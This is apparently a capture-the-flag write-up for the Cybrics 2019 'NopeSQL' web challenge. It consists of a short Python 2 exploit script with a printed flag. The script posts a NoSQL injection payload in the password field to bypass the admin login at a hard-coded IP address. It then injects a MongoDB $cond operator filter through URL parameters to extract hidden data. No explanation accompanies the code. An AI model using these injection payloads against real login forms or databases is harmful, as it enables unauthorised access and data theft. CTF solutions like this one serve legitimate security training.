Tags: web
Rating: 1.0
#/usr/bin/env python2
import requests
s = requests.Session()
data = {
'username':'admin',
'password':'","password":{"$ne":null},"username":"admin'
}
#login
response = s.post('http://173.199.118.226/index.php', data=data)
#flag
response = s.post('http://173.199.118.226/index.php?filter[$cond][if][$eq][][$strLenBytes]=$title&filter[$cond][if][$eq][][$toInt]=19&filter[$cond][then]=$text&filter[$cond][else]=12', data=data)
print(bytes(response.content).decode())
#flag --> bcybrics{7|-|15 15 4 7E><7 |=|_49}
[https://github.com/fg0ddd/CTF-Writeups/blob/master/Cybrics2019/WebExploitation/NopeSQL.py](http://)